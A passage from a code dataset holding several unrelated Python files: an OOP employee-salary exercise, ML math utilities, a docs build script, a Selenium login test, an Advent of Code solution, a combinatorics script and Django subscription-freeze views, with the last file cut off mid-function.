dept name and designation\n\n(example it can be Sales, Sales executive)\n\n \n\nCreate objects of EmpDeptDetails and display the output as following\n\n \n\nE1019 Ravi Kumar\n\nravi@gmail.com 9778845234\n\nSales , Sales executive\n\n'''\n\nclass Employ:\n def __init__(self,empid,name):\n self.empid=empid\n self.name=name\n def display(self):\n print(\"The Employee id is :\",self.empid)\n print(\"The Employee Name is :\",self.name)\nclass EmpDetails(Employ):\n def __init__(self,empid,name,email_id,mobile_number):\n super().__init__(empid,name)\n self.email_id=email_id\n self.mobile_number=mobile_number\n def emp_details_display(self):\n self.display()\n print(\"The Employee Email id is :\",self.email_id)\n print(\"The Employee Mobile Number is :\",self.mobile_number)\n \nclass EmpDeptDetails(EmpDetails):\n def __init__(self,empid,name,email_id,mobile_number,dept,designation):\n super().__init__(empid,name,email_id,mobile_number)\n \n self.dept=dept\n self.designation=designation\n def EmpDeptDetails_display(self):\n \n self.emp_details_display()\n print(\"The Employee Dept is :\",self.dept)\n print(\"The Employee designation in dept is :\",self.designation)\n \n \n#e=EmpDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234)\n#e.emp_details_display() \n \n \n#d=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n#d.EmpDeptDetails_display()\n\n'''\nOnce above program is working , create another class Salary having the data members as\nNumber of days worked, Net Salary\n\nThis Salary class should be aggregated to EmpDeptDetails (HAS A – relationship)\n\n \nThe output should come as\n \n\nE1229 Sundar Kumar\n\nsundar@gmail.com 9770045294\n\nPurchase , Purchase Manager\n\n28 , INR 56500\n\n'''\n\nclass Salary:\n def __init__(self,Number_of_days_worked,Net_Salary,empdd):\n self.Number_of_days_worked=Number_of_days_worked\n self.Net_Salary=Net_Salary\n self.empdd=empdd\n #self.edd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive') \n\n def Display(self):\n #self.edd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n self.empdd.EmpDeptDetails_display()\n print('The number of days working by employee is :',self.Number_of_days_worked)\n print(\"The Net Salary of the employee is :\",self.Net_Salary)\n \nd=EmpDeptDetails('E1019','Ravi Kumar','ravi@gmail.com',9778845234,'Sales' , 'Sales executive')\n \nsal=Salary(28,'INR 56500',d)\n#sal.Display()\n\n\n'''\n3. Create 4-5 objects and store it in list called emp_list[]\n Display all the stored objects from the list\n'''\n\nd1=EmpDeptDetails('A2019','Rohit Sharma','rohit@gmail.com',9337788452,'Cricket' , 'Batsman')\n \nrsal=Salary(20,'INR 506500',d1) \n \n \nd2=EmpDeptDetails('D9019','Ms Dhoni','ms@gmail.com',8488245234,'Sports' , 'Captain')\n \ndsal=Salary(28,'INR 560500',d2) \n\nd3=EmpDeptDetails('K9119','Virat','v@gmail.com',6685445234,'Hockey' , 'Goal Keeper')\n \nksal=Salary(28,'INR 56500',d3)\n\nd4=EmpDeptDetails('H1019','Hardik','h@gmail.com',8824045234,'Crickt' , 'All rounder')\n \nhsal=Salary(28,'INR 406500',d4)\n \n\nemp_list=[sal,rsal,dsal,ksal,hsal]\n\nfor i in emp_list:\n i.Display() \n print('*'*100)\n\n \n \n ","repo_name":"Som94/Python-repo","sub_path":"29 july/Assignment 2.py","file_name":"Assignment 2.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73336685704","text":"import copy\nimport math\nimport random\nimport numpy as np\n\n\n\nfrom statistics import mean, stdev\nfrom collections import defaultdict\n\n\n\ndef Entropy(prob_X):\n \"\"\"\n This is the entropy function that computes\n entropy of a given random variables X\n and with their corresponding probabilities\n p_i based on the definition in:\n\n Shanon and Weaver, 1949\n\n -> Links to paper :\n --> http://math.harvard.edu/~ctm/home/text/others/shannon/entropy/entropy.pdf\n --> https://ieeexplore.ieee.org/document/6773024\n\n\n Entropy = Σ_i p_i * log2 (p_i)\n\n\n INPUT:\n -------\n prob_X (a list/array of vairables):\n\n it should contains all the probabilities of\n the underlying random variable, each element\n expected to be a (0 <= float) and should\n add up to 1. (Else will be normalized)\n\n\n\n OUTPUT:\n -------\n Entropy (float): Entropy bits\n \"\"\"\n import math\n _sum_ = 0\n\n _tot_ = 0\n # checks\n for prob in prob_X:\n assert prob >= 0, \"Negetive probability is not accepted!!!\"\n _tot_ += prob\n\n# if _tot_!=1:\n# print(\"Inputs are not normalized added up to {}, will be normalized!!\".format(_tot_))\n\n for prob in prob_X:\n if _tot_==0:\n continue\n\n prob = prob/_tot_\n if prob == 0:\n pass\n else:\n _sum_ += prob * math.log2(prob)\n\n return abs(_sum_)\n\n\ndef Boolean_Entropy(q):\n \"\"\"\n Finds the entropy for a Boolean random variable.\n\n INPUT:\n ------\n q (float) : is expected to be between 0 and 1 (else AssertionError)\n\n OUTPUT:\n -------\n Entropy (float) : Entropy of a throwing a coin with chances\n of P(H, T) = (q, 1 - q) in bits\n\n\n \"\"\"\n assert q >= 0 and q <= 1, \"q = {} is not between [0,1]!\".format(q)\n\n return Entropy([q, 1-q])\n\n\ndef Boolean_Entropy_counts(p, n):\n \"\"\"\n Finds the entropy for a Boolean random variable.\n\n INPUT:\n ------\n p (int or float) : Number or relative fraction of positive instances\n n (int or float) : Number or relative fraction of negative instances\n\n OUTPUT:\n -------\n Entropy (float) : Entropy of a throwing a coin with chances\n of P(H, T) = (q, 1 - q) in bits\n\n with q = p / (n + p)\n\n \"\"\"\n if n==0 and p==0:\n return 0\n q = p / (n + p)\n return Boolean_Entropy(q)\n\n\n\n\ndef Remainder_Entropy(Attr, outcome):\n\n set_of_distinct_values = set(Attr)\n\n count_distict_values = len(set_of_distinct_values)\n count_distict_outcomes = len(set(outcome))\n\n assert count_distict_outcomes <= 2, \"{} different outcomes but expected Boolean\"\n\n\n count_total_positives = len([i for i in outcome if i!=0])\n count_total_negatives = len(outcome) - count_total_positives\n\n import numpy as np\n\n Attr_np = np.array(Attr)\n outcome_np = np.array(outcome)\n\n _sum_ = 0\n\n for value in set_of_distinct_values:\n _outcome_ = outcome_np[Attr_np==value]\n count_positives = len([i for i in _outcome_ if i!=0])\n count_negatives = len(_outcome_) - count_positives\n\n _entropy_ = Boolean_Entropy_counts(count_positives, count_negatives)\n _weights_ = (count_positives + count_negatives)\n _weights_ = _weights_ / (count_total_positives + count_total_negatives)\n\n _sum_ += _weights_ * _entropy_\n\n return _sum_\n\n\n\ndef Information_Gain(Attr, outcome):\n count_total_positives = len([i for i in outcome if i!=0])\n count_total_negatives = len(outcome) - count_total_positives\n\n intital_entropy = Boolean_Entropy_counts(count_total_positives, count_total_negatives)\n remaining_entropy = Remainder_Entropy(Attr, outcome)\n\n info_gain = intital_entropy - remaining_entropy\n\n return info_gain\n\n\n\ndef euclidean_distance(X, Y):\n return math.sqrt(sum((x - y)**2 for x, y in zip(X, Y)))\n\n\ndef cross_entropy_loss(X, Y):\n n=len(X)\n return (-1.0/n)*sum(x*math.log(y) + (1-x)*math.log(1-y) for x, y in zip(X, Y))\n\n\ndef rms_error(X, Y):\n return math.sqrt(ms_error(X, Y))\n\n\ndef ms_error(X, Y):\n return mean((x - y)**2 for x, y in zip(X, Y))\n\n\ndef mean_error(X, Y):\n return mean(abs(x - y) for x, y in zip(X, Y))\n\n\ndef manhattan_distance(X, Y):\n return sum(abs(x - y) for x, y in zip(X, Y))\n\n\ndef mean_boolean_error(X, Y):\n return mean(int(x != y) for x, y in zip(X, Y))\n\n\ndef hamming_distance(X, Y):\n return sum(x != y for x, y in zip(X, Y))\n\n\ndef _read_data_set(data_file, skiprows=0, separator=None):\n with open(data_file, \"r\") as f:\n file = f.read()\n lines = file.splitlines()\n lines = lines[skiprows:]\n\n data_ = [[] for _ in range(len(lines))]\n\n for i, line in enumerate(lines):\n splitted_line = line.split(separator)\n float_line = []\n for value in splitted_line:\n try:\n value = float(value)\n except ValueError:\n if value==\"\":\n continue\n else:\n pass\n float_line.append(value)\n if float_line:\n data_[i] = float_line\n\n for line in data_:\n if not line:\n data_.remove(line)\n\n return data_\n\ndef unique(seq):\n \"\"\"\n Remove any duplicate elements from any sequence,\n works on hashable elements such as int, float,\n string, and tuple.\n \"\"\"\n return list(set(seq))\n\n\ndef remove_all(item, seq):\n \"\"\"Return a copy of seq (or string) with all occurrences of item removed.\"\"\"\n if isinstance(seq, str):\n return seq.replace(item, '')\n else:\n return [x for x in seq if x != item]\n\n\ndef weighted_sample_with_replacement(n, seq, weights):\n \"\"\"Pick n samples from seq at random, with replacement, with the\n probability of each element in proportion to its corresponding\n weight.\"\"\"\n sample = weighted_sampler(seq, weights)\n\n return [sample() for _ in range(n)]\n\n\ndef weighted_sampler(seq, weights):\n \"\"\"Return a random-sample function that picks from seq weighted by weights.\"\"\"\n import bisect\n\n totals = []\n for w in weights:\n totals.append(w + totals[-1] if totals else w)\n\n return lambda: seq[bisect.bisect(totals, random.uniform(0, totals[-1]))]\n\n\ndef mode(data):\n import collections\n \"\"\"Return the most common data item. If there are ties, return any one of them.\"\"\"\n [(item, count)] = collections.Counter(data).most_common(1)\n return item\n\n# argmin and argmax\n\nidentity = lambda x: x\n\nargmin = min\nargmax = max\n\n\ndef argmin_random_tie(seq, key=identity):\n \"\"\"Return a minimum element of seq; break ties at random.\"\"\"\n return argmin(shuffled(seq), key=key)\n\n\ndef argmax_random_tie(seq, key=identity):\n \"\"\"Return an element with highest fn(seq[i]) score; break ties at random.\"\"\"\n return argmax(shuffled(seq), key=key)\n\n\ndef shuffled(iterable):\n \"\"\"Randomly shuffle a copy of iterable.\"\"\"\n items = list(iterable)\n random.shuffle(items)\n return items\n\ndef check_equal(iterator):\n iterator = iter(iterator)\n try:\n first = next(iterator)\n except StopIteration:\n return True\n return all(first == rest for rest in iterator)\n\ndef probability(p):\n \"\"\"Return true with probability p.\"\"\"\n return p > random.uniform(0.0, 1.0)\n\n\n\ndef Measure_accuracy(true_values, predictions):\n _sum_ = 0\n for truth, prediction in zip(true_values, predictions):\n if truth==prediction:\n _sum_+=1\n return _sum_/len(predictions)\n\n# Kernels for the SVM\ndef gaussian_kernel(X1, X2, sigma):\n '''\n INPUT:\n -------\n X1 : shape (N examples, n features)\n X2 : shape (N examples, n features)\n sigma : Parameter for gaussian kernel (rbf)\n OUTPUT:\n -------\n kernel: shape (N examples, N examples)\n '''\n return np.exp((-(np.linalg.norm(X1[None, :, :] - X2[:, None, :], axis=2) ** 2)) / (2 * sigma ** 2))\n\ndef linear_kernel(X1, X2, *args):\n '''\n INPUT:\n -------\n X1 : shape (N examples, n features)\n X2 : shape (N examples, n features)\n\n OUTPUT:\n -------\n kernel: shape (N examples, N examples)\n '''\n return np.tensordot(X2, X1, axes=(1, 1))\n","repo_name":"abtinshahidi/Foundation_applied_machine_learning","sub_path":"notebooks/week8/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"14901910760","text":"\"\"\"Simple script that helps with the documentation build process.\n\nThis includes converting SVG files to PDF files and rendering parts of the\ndocumentation.\n\nSee the commandline help for details.\n\"\"\"\n\nimport abc\nimport argparse\nimport datetime\nimport glob\nimport os\nimport subprocess\nimport sys\nimport textwrap\nimport inspect\n\nimport jinja2\nimport yaml\n\n\ndef main():\n \"\"\"The main function of the application\"\"\"\n try:\n # Parse the command line arguments extracting the tool to use.\n args = _parse_args()\n\n # Create and run the tool passing in the provided options.\n all_build_tools = _get_build_tool_command_map()\n build_tool_type = all_build_tools[args.build_tool]\n build_tool = build_tool_type(args.source_dir)\n build_tool.run()\n return 0\n\n except Exception as ex:\n print(\"Error: {0}\".format(ex), file=sys.stderr)\n return 1\n\n\nclass BuildTool(metaclass=abc.ABCMeta):\n \"\"\"Base class for build tools.\"\"\"\n\n def __init__(self, source_dir):\n \"\"\"Initializes the build tool with the provided options.\n\n :param source_dir: The directory to run the build tool over.\n \"\"\"\n self._source_dir = source_dir\n\n @abc.abstractmethod\n def run(self):\n \"\"\"Runs the build tool.\"\"\"\n pass\n\n @classmethod\n @abc.abstractmethod\n def get_command_name(cls):\n \"\"\"Provides the user visible name of the build tool.\n\n :return: The name of the build tool to use on the command line options.\n \"\"\"\n pass\n\n\nclass SVGToPDFBuildTool(BuildTool):\n \"\"\"Converts SVG files to PDF files so they can be used by LaTeX.\n\n The PDF file keeps the same basename as the SVG. The original SVGs are kept\n and any existing PDFs with the same name are overwritten.\n \"\"\"\n\n @classmethod\n def get_command_name(cls):\n return \"convert-svg\"\n\n def run(self):\n svg_files = self._find_svgs(self._source_dir)\n\n for svg in svg_files:\n self._convert_svg_to_pdf(svg)\n\n @staticmethod\n def _find_svgs(directory):\n \"\"\"Find all SVG files in the provided directory and all subdirectories.\n\n :param directory: The directory to search for SVGs.\n :return: An enumerable of SVG file names.\n \"\"\"\n return glob.glob(os.path.join(directory, \"**\", \"*.svg\"), recursive=True)\n\n @staticmethod\n def _convert_svg_to_pdf(svg_name):\n \"\"\"Converts the SVG provided SVG to a PDF file.\n\n The PDF file keeps the same basename as the SVG. The original SVG is kept\n and any existing PDFs with the same name are overwritten.\n\n :param svg_name: The name of the SVG file to convert.\n \"\"\"\n print(\"Converting: {}\".format(svg_name))\n\n pdf_name = os.path.splitext(svg_name)[0] + \".pdf\"\n args = ['inkscape', '-z',\n '-f', svg_name,\n '--export-pdf={}'.format(pdf_name)]\n subprocess.run(args, check=True)\n\n\nclass TemplateDataInfo:\n \"\"\"Class that holds information about a template to render.\"\"\"\n\n def __init__(self, template, output, data_source):\n \"\"\"Creates a new template data class.\n\n :param template: Path to the template file.\n :param output: Name of the output file to render.\n :param data_source: Path to the file containing the template's data.\n \"\"\"\n self.template = template\n self.output = output\n self.data_source = data_source\n\n\nclass RenderTemplatesBuildTool(BuildTool):\n \"\"\"Renders templates to output files using the Jinja templating engine.\"\"\"\n\n # List of all template to render.\n TEMPLATE_DATA_MAP = [\n TemplateDataInfo(template=\"environments.rst_t\",\n output=\"environments.rst\",\n data_source=\"environments.yaml\")\n ]\n\n @classmethod\n def get_command_name(cls):\n return \"render-templates\"\n\n def run(self):\n tool_info = self._get_tool_info()\n\n # For each item load its data and template. Then render the template and\n # write the output.\n for item in self.TEMPLATE_DATA_MAP:\n print(f\"Rendering template '{item.template}' to '{item.output}' \"\n f\"using data from '{item.data_source}'.\")\n data = self._load_data(item.data_source)\n template = self._load_template(item.template)\n # TODO: Determine a better way to set the template parameter names.\n # We only have one template at the moment so this is not a bug issue\n # but would cause more problems if we added templates in the future.\n rendered_template = template.render(\n environments=data,\n tool_info=tool_info)\n self._write_output(item.output, rendered_template)\n\n def _load_data(self, data_source):\n \"\"\"Loads data from the provided data source.\n\n :param data_source: Path to the data to load.\n :return: Dictionary containing the loaded data.\n \"\"\"\n with open(os.path.join(self._source_dir, data_source)) as f:\n return yaml.safe_load(f)\n\n def _load_template(self, template):\n \"\"\"Loads the indicated template.\n\n :param template: Path to the template to load.\n :return: The loaded Jinja template.\n \"\"\"\n template_path = os.path.join(self._source_dir, template)\n with open(template_path) as template_file:\n return jinja2.Template(template_file.read(),\n undefined=jinja2.StrictUndefined)\n\n def _write_output(self, filename, output):\n \"\"\"Writes the provided output to the indicated file.\n\n Any existing files are overwritten.\n\n :param filename: Name of the file to write the data to.\n :param output: The output text to write.\n \"\"\"\n output_path = os.path.join(self._source_dir, filename)\n with open(output_path, mode='w') as output_file:\n output_file.write(output)\n\n def _get_tool_info(self):\n \"\"\"Returns information about this tool.\n\n Templates can include this information to warn editors from modifying\n the rendered output files.\n \"\"\"\n return {\"tool_name\": sys.argv[0],\n \"render_time\": datetime.datetime.now()}\n\n\ndef _get_build_tool_command_map():\n \"\"\"Searches this module for all available build tools.\n\n :return: Dictionary whose keys are the tool's command name and whose values\n are the type of command.\n :raises RuntimeError: A error is raised if two build tools try to register\n the same command name.\n \"\"\"\n # Search the current module for classes that are build tools. Their command\n # name is extracted so the name and type can be added to the returned map.\n command_map = {}\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isclass(obj) and issubclass(obj, BuildTool) \\\n and not obj == BuildTool:\n command_name = obj.get_command_name()\n if command_name in command_map:\n existing_build_tool = command_map[command_name]\n raise RuntimeError(f\"Two build tools have registered the same \"\n f\"command name of '{command_name}': \"\n f\"{obj} and {existing_build_tool}.\")\n\n command_map[obj.get_command_name()] = obj\n\n return command_map\n\n\ndef _parse_args():\n description = textwrap.dedent(\"\"\"\\\n Script that helps with the documentation build process.\n \n This includes converting converting SVG files to PDF files using inkscape\n and rendering template files.\n \"\"\")\n\n epilog = textwrap.dedent(\"\"\"\\\n build tool actions:\n convert-svg:\n Converts all SVG files to PDF files. This allows LaTeX outputs to use \n these graphics. The PDF file keeps the same basename as the SVG. The \n original SVGs are kept and any existing PDFs with the same name are \n overwritten.\n \n render-templates:\n Renders the templates into their output forms. This allows a single\n input file to generate multiple output files. See the \n `RenderTemplatesBuildTool` in this script's source for more details.\n \n see also:\n * inkscape\n \"\"\")\n\n parser = argparse.ArgumentParser(\n description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('build_tool', metavar=\"ACTION\",\n choices=_get_build_tool_command_map().keys(),\n help=\"The action to take. See below for more details.\")\n parser.add_argument('source_dir', metavar=\"SOURCE_DIR\",\n help=\"Directory containing the source files for the\"\n \"build tool to use.\")\n\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"fossxo/fossxo-gdd","sub_path":"build-tools.py","file_name":"build-tools.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31666918813","text":"__author__ = 'HLTQ'\nimport unittest\nfrom selenium import webdriver\nfrom test_program.common.logger import Logger\nfrom test_program.common.em_Login import Login\nfrom test_program.common.em_LogOut import LogOut\nimport logging\nimport time\n\n\nclass LoginEm(unittest.TestCase):\n def setUp(self):\n try:\n self.driver = webdriver.Firefox()\n self.lg = Logger(\"C:/Users/HLZC/PycharmProjects/TQtest/test_program/logs\" + \"/Test_LoginEm.log\",\n flevel=logging.INFO)\n\n except:\n\n self.lg.logger.error(\"启动浏览器失败!\")\n\n\n def test_login(self):\n self.lg.info(\"启动浏览器成功!\")\n self.login_em = Login(self.driver, url=\"http://192.168.10.131:8000/EM\")\n self.login_em.go_LoginPage()\n self.login_em.login(\"00337\", \"123\")\n self.lg.info(\"wait 2s.\")\n time.sleep(2)\n self.driver.refresh()\n self.lg.info(\"refresh\")\n\n\n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__mian__\":\n unittest.main()\n\n\n","repo_name":"tiansimi/web_auto_program","sub_path":"test_program/testcases/login_EM.py","file_name":"login_EM.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20065992538","text":"# As the submarine drops below the surface of the ocean, it automatically performs a sonar sweep of the nearby sea floor. On a small screen, the sonar sweep report (your puzzle input) appears: each line is a measurement of the sea floor depth as the sweep looks further and further away from the submarine.\n\n# For example, suppose you had the following report:\n\n# 199\n# 200\n# 208\n# 210\n# 200\n# 207\n# 240\n# 269\n# 260\n# 263\n# This report indicates that, scanning outward from the submarine, the sonar sweep found depths of 199, 200, 208, 210, and so on.\n\n# The first order of business is to figure out how quickly the depth increases, just so you know what you're dealing with - you never know if the keys will get carried into deeper water by an ocean current or a fish or something.\n\n# To do this, count the number of times a depth measurement increases from the previous measurement. (There is no measurement before the first measurement.) In the example above, the changes are as follows:\n\n# 199 (N/A - no previous measurement)\n# 200 (increased)\n# 208 (increased)\n# 210 (increased)\n# 200 (decreased)\n# 207 (increased)\n# 240 (increased)\n# 269 (increased)\n# 260 (decreased)\n# 263 (increased)\n# In this example, there are 7 measurements that are larger than the previous measurement.\n\nfrom os import write\n\n# Turn into an array?\nwindows = [None,None,None,None]\nsignal_count = 0\nwindow_length = 3\nlast_closed_window_total = None\n\nwith open('day1-input.txt') as f:\n total_window_increases = 0\n for line in f:\n signal = int(line)\n\n wid = signal_count % (4)\n\n if wid == 0:\n # open window 0\n windows[0] = signal\n # close window 2\n if windows[2] != None:\n windows[2] += signal\n if (last_closed_window_total != None) and (windows[2] > last_closed_window_total):\n total_window_increases += 1\n if last_closed_window_total != None:\n last_closed_window_total = windows[2]\n \n windows[2] = None\n # increment window 3\n if windows[3] != None:\n windows[3] += signal\n elif wid == 1:\n # open window 1\n windows[1] = signal\n # close window 3\n if windows[3] != None:\n windows[3] += signal\n if (last_closed_window_total != None) and (windows[3] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[3]\n windows[3] = None\n # increment window 0\n if windows[0] != None:\n windows[0] += signal\n elif wid == 2:\n # open window 2\n windows[2] = signal\n # close window 0\n if windows[0] != None:\n windows[0] += signal\n if (last_closed_window_total != None) and (windows[0] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[0]\n windows[0] = None\n # increment window 1\n if windows[1] != None:\n windows[1] += signal\n else:\n # open window 3\n windows[3] = signal\n # close window 1\n if windows[1] != None:\n windows[1] += signal\n if (last_closed_window_total != None) and (windows[1] > last_closed_window_total):\n total_window_increases += 1\n last_closed_window_total = windows[1]\n windows[1] = None\n # increment window 2\n if windows[2] != None:\n windows[2] += signal\n \n signal_count += 1\n #TODO: parameterize this stupid logic\n #TODO: consider doing the first window outside the main logic to skip all the dumb checks.\n #TODO: optional trickiness - do this w/o a separate variable by using the list value\n\n print(total_window_increases)\n\n\n # Problem 1 solution\n # current = int(line)\n # if prev != None and current > prev:\n # count += 1\n # prev = current\n\n # print(count)","repo_name":"ChrisGwinn/adventofcode2021","sub_path":"day1/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74693405066","text":"memo = [([-1] * 190) for i in range(1, 190)]\nmemo2 = []\nfor j in range(0, 190):\n\tmemo2.append([([-1] * 190) for i in range(1, 190)])\nmemo3 = [([-1] * 190) for i in range(1, 190)]\n\ndef ch(n, p):\n\tif p > n or p < 0:\n\t\treturn 0\n\tif n == 0:\n\t\treturn 1\n\tif memo3[n][p] != -1:\n\t\treturn memo3[n][p]\n\tr = ch(n - 1, p) + ch(n - 1, p - 1)\n\tmemo3[n][p] = r\n\treturn r\n\ndef choose(n, sz, left):\n\tif left == 0:\n\t\treturn int(n == 0)\n\tif left > sz:\n\t\treturn 0\n\tif memo2[n][sz][left] != -1:\n\t\treturn memo2[n][sz][left]\n\tr = 0\n\tfor x in range(1, n + 1):\n\t\tr += ch(n - 1, x - 1) * choose(n - x, sz, left - 1) * pd(x - 1, sz)\n\tmemo2[n][sz][left] = r\n\t#print(\"choose(%d, %d, %d) = %d\" % (n, sz, left, r))\n\treturn r\n\ndef pd(n, mx):\n\tif n == 0:\n\t\treturn 1\n\tif memo[n][mx] != -1:\n\t\treturn memo[n][mx]\n\tr = 0\n\tfor sz in range(1, mx + 1):\n\t\tr += choose(n, sz, sz)\n\tmemo[n][mx] = r\n\t#print(\"pd(%d, %d) = %d\" % (n, mx, r))\n\treturn r\n\nimport sys\n\nfor i in range(1, 151):\n\tprint('\"' + str(pd(i - 1, i - 1)) + '\",')\n\tsys.stderr.write(str(i) + \"\\n\")\n","repo_name":"yancouto/competitive-programming","sub_path":"contests/asc33/E/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"21641488047","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response, redirect\n\nfrom django.core.context_processors import csrf\n\nfrom database.args import create_args\n\nfrom setup.models import Settings\n\n# Abonementi\nfrom subscriptions.models import *\n\n# Skapji\nfrom lockers.models import Skapji, Skapji_history\n\n# Klienta modelis\nfrom clients.models import Klienti\n\nfrom datetime import timedelta, datetime, date, time\n\n\ndef max_date(cli):\n subscriptions = Abonementi.objects.filter( client = cli, ended = False )\n activate_before_dates = []\n best_before_dates = []\n\n # savāc datumus\n for s in subscriptions:\n if s.active:\n best_before_dates.append( s.best_before )\n else:\n if isinstance( s.activate_before, datetime ) == True:\n activate_before_dates.append( s.activate_before )\n\n # nosaka max datumus AKTIVĒT LĪDZ\n if len( activate_before_dates ) > 1:\n max_activate = max(activate_before_dates)\n elif len( activate_before_dates ) == 1:\n max_activate = activate_before_dates[0]\n else:\n max_activate = []\n\n # nosaka max datumus DERĪGS LĪDZ\n if len( best_before_dates ) > 1:\n max_best_before = max(best_before_dates)\n elif len( best_before_dates ) == 1:\n max_best_before = best_before_dates[0]\n else:\n max_best_before = []\n\n # saliek max_1 un max_2\n max_dates = []\n if isinstance( max_activate, datetime ) == True:\n max_dates.append(max_activate)\n if isinstance( max_best_before, datetime ) == True:\n max_dates.append(max_best_before)\n\n # meklē jaunāko ja ir...\n if len( max_dates ) > 1:\n max_date = max(max_dates)\n elif len( max_dates ) == 1:\n max_date = max_dates[0]\n else:\n max_date = []\n\n return max_date\n\n\n\n#============================================================\n# !!!!! ABONEMENTA IESLADĒŠANA !!!!!\ndef subscription_freeze(request):\n args = create_args(request)\n if args['access'] == False:\n return redirect (Settings.objects.get( key = \"access denied redirect\" ).value)\n\n if args['loged_in'] == False:\n return redirect(\"/login/\")\n\n args.update(csrf(request)) # ADD CSRF TOKEN\n\n # Get Active client from COOKIE\n if \"active_client\" in request.COOKIES:\n# if True:\n try:\n c_id = int(request.COOKIES.get(str('active_client')))\n cli = Klienti.objects.get( id = c_id )\n\n # POST\n if request.POST:\n args['today'] = (datetime.now() - timedelta(days=3)).date()\n max_d = max_date( cli )\n args['max_date'] = max_d\n\n args['client'] = cli\n\n f_start_str = request.POST.get('freeze_start', '')\n f_end_str = request.POST.get('freeze_end', '')\n\n # convert dates from string to datetime\n date_error = False\n try:\n f_start_date = datetime.strptime( f_start_str, '%Y-%m-%d')\n except:\n args['start_error'] = True\n date_error = True\n try:\n f_end_date = datetime.strptime( f_end_str, '%Y-%m-%d')\n except:\n args['end_error'] = True\n date_error = True\n\n # dates error\n if date_error == True:\n return render_to_response ( 'subscription_freeze.html', args )\n\n if f_end_date.date() > max_d.date(): #(max_date( cli ) + timedelta(days=1)).date:\n args['end_limit'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n\n # Client in the club error\n if f_start_date.date() <= date.today() and f_end_date.date() >= date.today():\n # Check if client is in club at this moment\n try:\n c_l = Skapji.objects.get( client = cli )\n args['client_in_club'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n except:\n pass\n\n # Check if client has been in club today\n try:\n date_min = datetime.combine(f_start_date.date(), time.min)\n today_max = datetime.combine(date.today(), time.max)\n c_l = Skapji_history.objects.filter( client = cli, checkin_time__range=(date_min, today_max) )\n if c_l.count() > 0:\n args['client_was_in_club'] = True\n return render_to_response ( 'subscription_freeze.html', args )\n except:\n pass\n\n d = (f_end_date - f_start_date).days + 1\n args['days'] = d\n\n # !!!!! freeze process !!!!!\n subscr = Abonementi.objects.filter( client = cli, ended = False )\n\n # freeze client\n cli.frozen_from = f_start_date.date()\n cli.frozen_until = f_end_date.date()\n if cli.frozen_from <= date.today():\n cli.frozen = True\n cli.save()\n\n for s in subscr:\n if s.active:\n new_freeze = Abonementu_Iesalde( user=args['username'], client=cli, subscr=s, best_before=s.best_before,\n freeze_from=f_start_date.date(), freeze_until=f_end_date.date() )\n new_freeze.save()\n s.best_before = s.best_before + timedelta(days = d)\n else:\n new_freeze = Abonementu_Iesalde( user=args['username'], client=cli, subscr=s, activate_before=s.activate_before,\n freeze_from=f_start_date.date(), freeze_until=f_end_date.date() )\n new_freeze.save()\n s.activate_before = s.activate_before + timedelta(days=d)\n s.save()\n\n # GET\n else:\n args['today'] = (datetime.now() - timedelta(days=3)).date()\n args['max_date'] = max_date( cli )\n args['client'] = cli\n except:\n pass\n return render_to_response ( 'subscription_freeze.html', args )\n\n\n#============================================================\n# !!!!! CANCEL SUBSCRIPTION FREEZE !!!!!\ndef subscription_unfreeze(request):\n args = create_args(request)\n if args['access'] == False:\n return redirect (Settings.objects.get( key = \"access denied redirect\" ).value)\n\n if args['loged_in'] == False:\n return redirect(\"/login/\")\n\n # Get Active client from COOKIE\n if \"active_client\" in request.COOKIES:\n if True:\n# try:\n c_id = int(request.COOKIES.get(str('active_client')))\n cli = Klienti.objects.get( id = c_id )\n\n # Unfreeze Klienti object\n cli.frozen = False\n cli.frozen_from = None\n cli.frozen_until = None\n cli.save()\n\n # today\n today = date.today()\n\n # Return dates to initial\n freeze = Abonementu_Iesalde.objects.filter( client=cli )\n\n for f in freeze:\n if f.freeze_from <= today and f.freeze_until >= today:\n# return redirect (\"/client/new/\")\n if f.subscr.active:\n f.subscr.best_before = f.best_before\n else:\n f.subscr.activate_before = f.activate_before\n f.subscr.save()\n f.delete()\n# except:\n# pass\n return redirect (\"/\")\n","repo_name":"svabis/db","sub_path":"subscriptions/views/freeze.py","file_name":"freeze.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38795351646","text":"import random\n\n\n# Input parameters - p_bonus - represents the bonus to the roll (integer)\n# Returns - Number of dead raised\n# Description - Simulates rolling a 20-sided dice to decide if Atwood successfully calls animate_dead.\n# If she rolls 5 or under, she will raise zero undead.\n# Otherwise, she raises the number of undead equal to (roll + p_bonus)\n# Example 1: p_bonus = 4. Necromancer Atwood rolls 